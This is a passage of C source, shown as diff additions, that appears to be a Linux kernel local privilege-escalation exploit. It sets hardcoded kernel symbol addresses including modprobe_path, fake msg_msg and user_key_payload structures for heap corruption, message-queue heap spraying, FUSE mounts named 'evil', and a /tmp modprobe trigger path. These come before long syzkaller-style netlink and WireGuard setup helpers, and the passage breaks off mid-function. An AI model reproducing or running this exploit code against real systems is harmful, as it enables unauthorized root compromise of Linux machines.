+#define SLAB_4k_CPU_PARTIAL 2 +#define SIZE_OF_MSG_MSG 48 +#define SIZE_OF_MSG_MSGSEG 8 +#define OOB_PAGE 0xf +#define PAGE_SIZE 0x1000 +#define TTY_NUM 32 +#define LAST_PAGE_GAP_BYTES 0x88 +#define MSG_LEN 0x1018 + + +#define CLEAR_LIST 0 +#define PRINT_STACK_DEBUG 1 +#define PRINT_PAGE_ALLOC 1 << 1 +#define PRINT_PAGE_FREE 1 << 2 +#define PRINT_MSG 1 << 3 +#define PRINT_USER_KEY_PAYLOAD 1 
<< 4 +#define PRINT_OOB_INFO 1 << 5 +#define PRINT_ANY_PROC 1 << 6 +#define PRINT_PAGE_CUR_ORDER 1 << 7 +#define PRINT_PAGE_FREE_DETAIL 1 << 8 +#define PRINT_XATTR 1 << 9 +#define PRINT_OOB_DETAIL 1 << 10 +#define PRINT_TARGET_SLAB 1 << 11 +#define PRINT_MSG_DETAIL 1 << 12 + +#define SIZE_OF_USER_KEY_PAYLOAD 2049 +#define SIZE_OF_USER_KEY_PAYLOAD_SLAB 4096 + +#define HEAP_SPRAY_LOOP 2 +#define N_PROCS 8 +#define N_LOOP N_PROCS +#define FUSE_MOUNT1 "evil1" +#define FUSE_MOUNT2 "evil2" +#define PROC_MODPROBE_TRIGGER "/tmp/modprobe_trigger" + +#define MAX_QBYTES_IN_QUEUE 1024 +#define BASE_MSGTYPE 0x1 +#define MSG_HEADER_SIZE 0x30 +#define MSG_SPARY 0x37 + +uint64_t addr_single_start = 0xffffffff8134b7f0; +uint64_t addr_single_stop = 0xffffffff8134b830; +uint64_t addr_single_next = 0xffffffff8134b810; +uint64_t addr_modprobe_path = 0xffffffff82e6e220; + +int64_t kaslr_offset = 0; +int pause_flag = 1; +char *evil_buffer; +uint64_t msg_next = NULL, msglist_prev = NULL, msglist_next = NULL; +int fuse_fd = -1; +void *fuse_mem_addr = NULL; + +int msqid[0x1000]; +int max_msg; +//#include "sandbox.h" +struct list_head { + struct list_head *next, *prev; +}; + +struct msgbuf_key { + long mtype; + char mtext[1]; +}; + +struct spary_msg_arg { + int msqid; + int start; + int loop; + int size; + char *payload; + void *dst; +}; + +struct msg +{ + long mtype; + char mtext[1]; +}; + +struct fake_msg_msg { + struct list_head m_list; + long m_type; + size_t m_ts; /* message text size */ + void *next; + void *security; + /* the actual message follows immediately */ +}; + +typedef struct +{ + int done; + pthread_mutex_t mutex; + pthread_mutex_t proc_mutex[N_PROCS+1]; +} shared_data; + +struct spray_argv { + void *addr; + int size; + pthread_mutex_t *mutex; + int *count; +}; + +static shared_data *free_mutex; +static shared_data *spray_lock; +static shared_data *two_loop; +static shared_data *shell_lock; +static shared_data *hang_threads; +struct fake_user_key_payload { + void *next; + 
void *callback; + short unsigned int datalen; +}; + +static unsigned long long procid; + +static __thread int skip_segv; +static __thread jmp_buf segv_env; + + +void *recvmymsg(int _msqid, int size, void *memdump, int type, int free) { + if (!free) + free = MSG_COPY; + if (msgrcv(_msqid, (void *) memdump, size, type, + IPC_NOWAIT | free | MSG_NOERROR) == -1) { + if(errno != ENOMSG) { + perror("msgrcv"); + exit(1); + } + } +} + +int msg_spray(int num_msg, int size, int loop) { + int i; +#ifdef MSG_DEBUG + printf("[*] msg_spray: num_msg: %d, size: %d, loop: %d\n", num_msg, size, loop); +#endif + + for (i = 0; imtext[0], MSG_SPARY, buff_size); + for (i = start; i < start+loop; i++) { + msg_key->mtype = BASE_MSGTYPE + i; + //printf("[*] sendmymsg: msqid: %d, mtype: %ld\n", _msqid, msg_key->mtype); + int ret = msgsnd(_msqid, msg_key, buff_size, 0); + //printf("[*] sendmymsg: msqid: %d, ret: %d\n", _msqid, ret); + if (ret == -1) { + printf("msgsnd error\n"); + exit(1); + } + } + free(msg_key); +} + +void load_symbols() +{ + struct utsname version; + char buf[1024]; + char *symbol; + int ret; + FILE *fp; + u_int64_t addr; + + ret = uname(&version); + if (ret != 0) { + printf("Failed to retrieve kernel version using uname()\n"); + exit(EXIT_FAILURE); + } + printf("Kernel version %s\n", version.release); + + memset(buf, 0, sizeof(buf)); + snprintf(buf, sizeof(buf), "symbols/System.map-%s", version.release); + + fp = fopen(buf, "r"); + if (fp == NULL) { + printf("Failed to open symbol file %s\n", buf); + return; + } + + while(fgets(buf, sizeof(buf), fp) != NULL) { + buf[16] = 0; + addr = strtoul(buf, NULL, 16); + symbol = &buf[19]; + if (!strcmp(symbol, "single_start\n")) { + addr_single_start = addr; + printf("0x%016llx single_start\n", addr_single_start); + } + if (!strcmp(symbol, "single_stop\n")) { + addr_single_stop = addr; + printf("0x%016llx single_stop\n", addr_single_stop); + } + if (!strcmp(symbol, "single_next\n")) { + addr_single_next = addr; + printf("0x%016llx 
single_next\n", addr_single_next); + } + if (!strcmp(symbol, "modprobe_path\n")) { + addr_modprobe_path = addr; + printf("0x%016llx modprobe_path\n", addr_modprobe_path); + } + } + + fclose(fp); + + if (!addr_single_start || + !addr_single_stop || + !addr_single_next || + !addr_modprobe_path) { + printf("Missing at least one symbols.\n"); + exit(EXIT_FAILURE); + } +} + +#define NONFAILING(...) \ + ({ \ + int ok = 1; \ + __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ + if (_setjmp(segv_env) == 0) { \ + __VA_ARGS__; \ + } else \ + ok = 0; \ + __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ + ok; \ + }) + +static bool write_file(const char* file, const char* what, ...) +{ + char buf[1024]; + va_list args; + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + buf[sizeof(buf) - 1] = 0; + int len = strlen(buf); + int fd = open(file, O_WRONLY | O_CLOEXEC); + if (fd == -1) + return false; + if (write(fd, buf, len) != len) { + int err = errno; + close(fd); + errno = err; + return false; + } + close(fd); + return true; +} + +struct nlmsg { + char* pos; + int nesting; + struct nlattr* nested[8]; + char buf[4096]; +}; + +static void netlink_init(struct nlmsg* nlmsg, int typ, int flags, + const void* data, int size) +{ + memset(nlmsg, 0, sizeof(*nlmsg)); + struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf; + hdr->nlmsg_type = typ; + hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags; + memcpy(hdr + 1, data, size); + nlmsg->pos = (char*)(hdr + 1) + NLMSG_ALIGN(size); +} + +static void netlink_attr(struct nlmsg* nlmsg, int typ, const void* data, + int size) +{ + struct nlattr* attr = (struct nlattr*)nlmsg->pos; + attr->nla_len = sizeof(*attr) + size; + attr->nla_type = typ; + if (size > 0) + memcpy(attr + 1, data, size); + nlmsg->pos += NLMSG_ALIGN(attr->nla_len); +} + +static void netlink_nest(struct nlmsg* nlmsg, int typ) +{ + struct nlattr* attr = (struct nlattr*)nlmsg->pos; + attr->nla_type = typ; + nlmsg->pos += 
sizeof(*attr); + nlmsg->nested[nlmsg->nesting++] = attr; +} + +static void netlink_done(struct nlmsg* nlmsg) +{ + struct nlattr* attr = nlmsg->nested[--nlmsg->nesting]; + attr->nla_len = nlmsg->pos - (char*)attr; +} + +static int netlink_send_ext(struct nlmsg* nlmsg, int sock, uint16_t reply_type, + int* reply_len, bool dofail) +{ + if (nlmsg->pos > nlmsg->buf + sizeof(nlmsg->buf) || nlmsg->nesting) + exit(1); + struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf; + hdr->nlmsg_len = nlmsg->pos - nlmsg->buf; + struct sockaddr_nl addr; + memset(&addr, 0, sizeof(addr)); + addr.nl_family = AF_NETLINK; + ssize_t n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0, + (struct sockaddr*)&addr, sizeof(addr)); + if (n != (ssize_t)hdr->nlmsg_len) { + if (dofail) + exit(1); + return -1; + } + n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0); + if (reply_len) + *reply_len = 0; + if (n < 0) { + if (dofail) + exit(1); + return -1; + } + if (n < (ssize_t)sizeof(struct nlmsghdr)) { + errno = EINVAL; + if (dofail) + exit(1); + return -1; + } + if (hdr->nlmsg_type == NLMSG_DONE) + return 0; + if (reply_len && hdr->nlmsg_type == reply_type) { + *reply_len = n; + return 0; + } + if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr))) { + errno = EINVAL; + if (dofail) + exit(1); + return -1; + } + if (hdr->nlmsg_type != NLMSG_ERROR) { + errno = EINVAL; + if (dofail) + exit(1); + return -1; + } + errno = -((struct nlmsgerr*)(hdr + 1))->error; + return -errno; +} + +static int netlink_send(struct nlmsg* nlmsg, int sock) +{ + return netlink_send_ext(nlmsg, sock, 0, NULL, true); +} + +static int netlink_query_family_id(struct nlmsg* nlmsg, int sock, + const char* family_name, bool dofail) +{ + struct genlmsghdr genlhdr; + memset(&genlhdr, 0, sizeof(genlhdr)); + genlhdr.cmd = CTRL_CMD_GETFAMILY; + netlink_init(nlmsg, GENL_ID_CTRL, 0, &genlhdr, sizeof(genlhdr)); + netlink_attr(nlmsg, CTRL_ATTR_FAMILY_NAME, family_name, + strnlen(family_name, GENL_NAMSIZ - 1) + 1); + int n = 0; + int 
err = netlink_send_ext(nlmsg, sock, GENL_ID_CTRL, &n, dofail); + if (err < 0) { + return -1; + } + uint16_t id = 0; + struct nlattr* attr = (struct nlattr*)(nlmsg->buf + NLMSG_HDRLEN + + NLMSG_ALIGN(sizeof(genlhdr))); + for (; (char*)attr < nlmsg->buf + n; + attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) { + if (attr->nla_type == CTRL_ATTR_FAMILY_ID) { + id = *(uint16_t*)(attr + 1); + break; + } + } + if (!id) { + errno = EINVAL; + return -1; + } + recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0); + return id; +} + +static int netlink_next_msg(struct nlmsg* nlmsg, unsigned int offset, + unsigned int total_len) +{ + struct nlmsghdr* hdr = (struct nlmsghdr*)(nlmsg->buf + offset); + if (offset == total_len || offset + hdr->nlmsg_len > total_len) + return -1; + return hdr->nlmsg_len; +} + +static void netlink_add_device_impl(struct nlmsg* nlmsg, const char* type, + const char* name) +{ + struct ifinfomsg hdr; + memset(&hdr, 0, sizeof(hdr)); + netlink_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, + sizeof(hdr)); + if (name) + netlink_attr(nlmsg, IFLA_IFNAME, name, strlen(name)); + netlink_nest(nlmsg, IFLA_LINKINFO); + netlink_attr(nlmsg, IFLA_INFO_KIND, type, strlen(type)); +} + +static void netlink_add_device(struct nlmsg* nlmsg, int sock, const char* type, + const char* name) +{ + netlink_add_device_impl(nlmsg, type, name); + netlink_done(nlmsg); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_veth(struct nlmsg* nlmsg, int sock, const char* name, + const char* peer) +{ + netlink_add_device_impl(nlmsg, "veth", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + netlink_nest(nlmsg, VETH_INFO_PEER); + nlmsg->pos += sizeof(struct ifinfomsg); + netlink_attr(nlmsg, IFLA_IFNAME, peer, strlen(peer)); + netlink_done(nlmsg); + netlink_done(nlmsg); + netlink_done(nlmsg); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_hsr(struct nlmsg* nlmsg, int sock, const char* name, + 
const char* slave1, const char* slave2) +{ + netlink_add_device_impl(nlmsg, "hsr", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + int ifindex1 = if_nametoindex(slave1); + netlink_attr(nlmsg, IFLA_HSR_SLAVE1, &ifindex1, sizeof(ifindex1)); + int ifindex2 = if_nametoindex(slave2); + netlink_attr(nlmsg, IFLA_HSR_SLAVE2, &ifindex2, sizeof(ifindex2)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_linked(struct nlmsg* nlmsg, int sock, const char* type, + const char* name, const char* link) +{ + netlink_add_device_impl(nlmsg, type, name); + netlink_done(nlmsg); + int ifindex = if_nametoindex(link); + netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex)); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_vlan(struct nlmsg* nlmsg, int sock, const char* name, + const char* link, uint16_t id, uint16_t proto) +{ + netlink_add_device_impl(nlmsg, "vlan", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + netlink_attr(nlmsg, IFLA_VLAN_ID, &id, sizeof(id)); + netlink_attr(nlmsg, IFLA_VLAN_PROTOCOL, &proto, sizeof(proto)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int ifindex = if_nametoindex(link); + netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex)); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_macvlan(struct nlmsg* nlmsg, int sock, const char* name, + const char* link) +{ + netlink_add_device_impl(nlmsg, "macvlan", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + uint32_t mode = MACVLAN_MODE_BRIDGE; + netlink_attr(nlmsg, IFLA_MACVLAN_MODE, &mode, sizeof(mode)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int ifindex = if_nametoindex(link); + netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex)); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_add_geneve(struct nlmsg* nlmsg, int sock, const char* name, + uint32_t vni, struct in_addr* addr4, + struct 
in6_addr* addr6) +{ + netlink_add_device_impl(nlmsg, "geneve", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + netlink_attr(nlmsg, IFLA_GENEVE_ID, &vni, sizeof(vni)); + if (addr4) + netlink_attr(nlmsg, IFLA_GENEVE_REMOTE, addr4, sizeof(*addr4)); + if (addr6) + netlink_attr(nlmsg, IFLA_GENEVE_REMOTE6, addr6, sizeof(*addr6)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +#define IFLA_IPVLAN_FLAGS 2 +#define IPVLAN_MODE_L3S 2 +#undef IPVLAN_F_VEPA +#define IPVLAN_F_VEPA 2 + +static void netlink_add_ipvlan(struct nlmsg* nlmsg, int sock, const char* name, + const char* link, uint16_t mode, uint16_t flags) +{ + netlink_add_device_impl(nlmsg, "ipvlan", name); + netlink_nest(nlmsg, IFLA_INFO_DATA); + netlink_attr(nlmsg, IFLA_IPVLAN_MODE, &mode, sizeof(mode)); + netlink_attr(nlmsg, IFLA_IPVLAN_FLAGS, &flags, sizeof(flags)); + netlink_done(nlmsg); + netlink_done(nlmsg); + int ifindex = if_nametoindex(link); + netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex)); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static void netlink_device_change(struct nlmsg* nlmsg, int sock, + const char* name, bool up, const char* master, + const void* mac, int macsize, + const char* new_name) +{ + struct ifinfomsg hdr; + memset(&hdr, 0, sizeof(hdr)); + if (up) + hdr.ifi_flags = hdr.ifi_change = IFF_UP; + hdr.ifi_index = if_nametoindex(name); + netlink_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr)); + if (new_name) + netlink_attr(nlmsg, IFLA_IFNAME, new_name, strlen(new_name)); + if (master) { + int ifindex = if_nametoindex(master); + netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex)); + } + if (macsize) + netlink_attr(nlmsg, IFLA_ADDRESS, mac, macsize); + int err = netlink_send(nlmsg, sock); + if (err < 0) { + } +} + +static int netlink_add_addr(struct nlmsg* nlmsg, int sock, const char* dev, + const void* addr, int addrsize) +{ + struct ifaddrmsg hdr; + memset(&hdr, 0, sizeof(hdr)); + 
hdr.ifa_family = addrsize == 4 ? AF_INET : AF_INET6; + hdr.ifa_prefixlen = addrsize == 4 ? 24 : 120; + hdr.ifa_scope = RT_SCOPE_UNIVERSE; + hdr.ifa_index = if_nametoindex(dev); + netlink_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, + sizeof(hdr)); + netlink_attr(nlmsg, IFA_LOCAL, addr, addrsize); + netlink_attr(nlmsg, IFA_ADDRESS, addr, addrsize); + return netlink_send(nlmsg, sock); +} + +static void netlink_add_addr4(struct nlmsg* nlmsg, int sock, const char* dev, + const char* addr) +{ + struct in_addr in_addr; + inet_pton(AF_INET, addr, &in_addr); + int err = netlink_add_addr(nlmsg, sock, dev, &in_addr, sizeof(in_addr)); + if (err < 0) { + } +} + +static void netlink_add_addr6(struct nlmsg* nlmsg, int sock, const char* dev, + const char* addr) +{ + struct in6_addr in6_addr; + inet_pton(AF_INET6, addr, &in6_addr); + int err = netlink_add_addr(nlmsg, sock, dev, &in6_addr, sizeof(in6_addr)); + if (err < 0) { + } +} + +static struct nlmsg nlmsg; + +#define DEVLINK_FAMILY_NAME "devlink" + +#define DEVLINK_CMD_PORT_GET 5 +#define DEVLINK_ATTR_BUS_NAME 1 +#define DEVLINK_ATTR_DEV_NAME 2 +#define DEVLINK_ATTR_NETDEV_NAME 7 + +static struct nlmsg nlmsg2; + +static void initialize_devlink_ports(const char* bus_name, const char* dev_name, + const char* netdev_prefix) +{ + struct genlmsghdr genlhdr; + int len, total_len, id, err, offset; + uint16_t netdev_index; + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC); + if (sock == -1) + exit(1); + int rtsock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (rtsock == -1) + exit(1); + id = netlink_query_family_id(&nlmsg, sock, DEVLINK_FAMILY_NAME, true); + if (id == -1) + goto error; + memset(&genlhdr, 0, sizeof(genlhdr)); + genlhdr.cmd = DEVLINK_CMD_PORT_GET; + netlink_init(&nlmsg, id, NLM_F_DUMP, &genlhdr, sizeof(genlhdr)); + netlink_attr(&nlmsg, DEVLINK_ATTR_BUS_NAME, bus_name, strlen(bus_name) + 1); + netlink_attr(&nlmsg, DEVLINK_ATTR_DEV_NAME, dev_name, strlen(dev_name) + 1); + err = 
netlink_send_ext(&nlmsg, sock, id, &total_len, true); + if (err < 0) { + goto error; + } + offset = 0; + netdev_index = 0; + while ((len = netlink_next_msg(&nlmsg, offset, total_len)) != -1) { + struct nlattr* attr = (struct nlattr*)(nlmsg.buf + offset + NLMSG_HDRLEN + + NLMSG_ALIGN(sizeof(genlhdr))); + for (; (char*)attr < nlmsg.buf + offset + len; + attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) { + if (attr->nla_type == DEVLINK_ATTR_NETDEV_NAME) { + char* port_name; + char netdev_name[IFNAMSIZ]; + port_name = (char*)(attr + 1); + snprintf(netdev_name, sizeof(netdev_name), "%s%d", netdev_prefix, + netdev_index); + netlink_device_change(&nlmsg2, rtsock, port_name, true, 0, 0, 0, + netdev_name); + break; + } + } + offset += len; + netdev_index++; + } +error: + close(rtsock); + close(sock); +} + +#define DEV_IPV4 "172.20.20.%d" +#define DEV_IPV6 "fe80::%02x" +#define DEV_MAC 0x00aaaaaaaaaa + +static void netdevsim_add(unsigned int addr, unsigned int port_count) +{ + char buf[16]; + sprintf(buf, "%u %u", addr, port_count); + if (write_file("/sys/bus/netdevsim/new_device", buf)) { + snprintf(buf, sizeof(buf), "netdevsim%d", addr); + initialize_devlink_ports("netdevsim", buf, "netdevsim"); + } +} + +#define WG_GENL_NAME "wireguard" +enum wg_cmd { + WG_CMD_GET_DEVICE, + WG_CMD_SET_DEVICE, +}; +enum wgdevice_attribute { + WGDEVICE_A_UNSPEC, + WGDEVICE_A_IFINDEX, + WGDEVICE_A_IFNAME, + WGDEVICE_A_PRIVATE_KEY, + WGDEVICE_A_PUBLIC_KEY, + WGDEVICE_A_FLAGS, + WGDEVICE_A_LISTEN_PORT, + WGDEVICE_A_FWMARK, + WGDEVICE_A_PEERS, +}; +enum wgpeer_attribute { + WGPEER_A_UNSPEC, + WGPEER_A_PUBLIC_KEY, + WGPEER_A_PRESHARED_KEY, + WGPEER_A_FLAGS, + WGPEER_A_ENDPOINT, + WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + WGPEER_A_LAST_HANDSHAKE_TIME, + WGPEER_A_RX_BYTES, + WGPEER_A_TX_BYTES, + WGPEER_A_ALLOWEDIPS, + WGPEER_A_PROTOCOL_VERSION, +}; +enum wgallowedip_attribute { + WGALLOWEDIP_A_UNSPEC, + WGALLOWEDIP_A_FAMILY, + WGALLOWEDIP_A_IPADDR, + WGALLOWEDIP_A_CIDR_MASK, +}; 
+ +static void netlink_wireguard_setup(void) +{ + const char ifname_a[] = "wg0"; + const char ifname_b[] = "wg1"; + const char ifname_c[] = "wg2"; + const char private_a[] = + "\xa0\x5c\xa8\x4f\x6c\x9c\x8e\x38\x53\xe2\xfd\x7a\x70\xae\x0f\xb2\x0f\xa1" + "\x52\x60\x0c\xb0\x08\x45\x17\x4f\x08\x07\x6f\x8d\x78\x43"; + const char private_b[] = + "\xb0\x80\x73\xe8\xd4\x4e\x91\xe3\xda\x92\x2c\x22\x43\x82\x44\xbb\x88\x5c" + "\x69\xe2\x69\xc8\xe9\xd8\x35\xb1\x14\x29\x3a\x4d\xdc\x6e"; + const char private_c[] = + "\xa0\xcb\x87\x9a\x47\xf5\xbc\x64\x4c\x0e\x69\x3f\xa6\xd0\x31\xc7\x4a\x15" + "\x53\xb6\xe9\x01\xb9\xff\x2f\x51\x8c\x78\x04\x2f\xb5\x42"; + const char public_a[] = + "\x97\x5c\x9d\x81\xc9\x83\xc8\x20\x9e\xe7\x81\x25\x4b\x89\x9f\x8e\xd9\x25" + "\xae\x9f\x09\x23\xc2\x3c\x62\xf5\x3c\x57\xcd\xbf\x69\x1c"; + const char public_b[] = + "\xd1\x73\x28\x99\xf6\x11\xcd\x89\x94\x03\x4d\x7f\x41\x3d\xc9\x57\x63\x0e" + "\x54\x93\xc2\x85\xac\xa4\x00\x65\xcb\x63\x11\xbe\x69\x6b"; + const char public_c[] = + "\xf4\x4d\xa3\x67\xa8\x8e\xe6\x56\x4f\x02\x02\x11\x45\x67\x27\x08\x2f\x5c" + "\xeb\xee\x8b\x1b\xf5\xeb\x73\x37\x34\x1b\x45\x9b\x39\x22"; + const uint16_t listen_a = 20001; + const uint16_t listen_b = 20002; + const uint16_t listen_c = 20003; + const uint16_t af_inet = AF_INET; + const uint16_t af_inet6 = AF_INET6; + const struct sockaddr_in endpoint_b_v4 = { + .sin_family = AF_INET, + .sin_port = htons(listen_b), + .sin_addr = {htonl(INADDR_LOOPBACK)}}; + const struct sockaddr_in endpoint_c_v4 = { + .sin_family = AF_INET, + .sin_port = htons(listen_c), + .sin_addr = {htonl(INADDR_LOOPBACK)}}; + struct sockaddr_in6 endpoint_a_v6 = {.sin6_family = AF_INET6, + .sin6_port = htons(listen_a)}; + endpoint_a_v6.sin6_addr = in6addr_loopback; + struct sockaddr_in6 endpoint_c_v6 = {.sin6_family = AF_INET6, + .sin6_port = htons(listen_c)}; + endpoint_c_v6.sin6_addr = in6addr_loopback; + const struct in_addr first_half_v4 = {0}; + const struct in_addr second_half_v4 = {(uint32_t)htonl(128 << 
24)}; + const struct in6_addr first_half_v6 = {{{0}}}; + const struct in6_addr second_half_v6 = {{{0x80}}}; + const uint8_t half_cidr = 1; + const uint16_t persistent_keepalives[] = {1, 3, 7, 9, 14, 19}; + struct genlmsghdr genlhdr = {.cmd = WG_CMD_SET_DEVICE, .version = 1}; + int sock; + int id, err; + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC); + if (sock == -1) { + return; + } + id = netlink_query_family_id(&nlmsg, sock, WG_GENL_NAME, true); + if (id == -1) + goto error; + netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr)); + netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_a, strlen(ifname_a) + 1); + netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_a, 32); + netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_a, 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4, + sizeof(endpoint_b_v4)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[0], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, + sizeof(first_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, + sizeof(first_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v6, + sizeof(endpoint_c_v6)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + 
&persistent_keepalives[1], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, + sizeof(second_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, + sizeof(second_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + err = netlink_send(&nlmsg, sock); + if (err < 0) { + } + netlink_init(&nlmsg, id, 0, &genlhdr, sizeof(genlhdr)); + netlink_attr(&nlmsg, WGDEVICE_A_IFNAME, ifname_b, strlen(ifname_b) + 1); + netlink_attr(&nlmsg, WGDEVICE_A_PRIVATE_KEY, private_b, 32); + netlink_attr(&nlmsg, WGDEVICE_A_LISTEN_PORT, &listen_b, 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGDEVICE_A_PEERS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_a, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_a_v6, + sizeof(endpoint_a_v6)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[2], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v4, + sizeof(first_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, + sizeof(first_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + 
netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_c, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_c_v4, + sizeof(endpoint_c_v4)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[3], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, + sizeof(second_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, + sizeof(second_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + 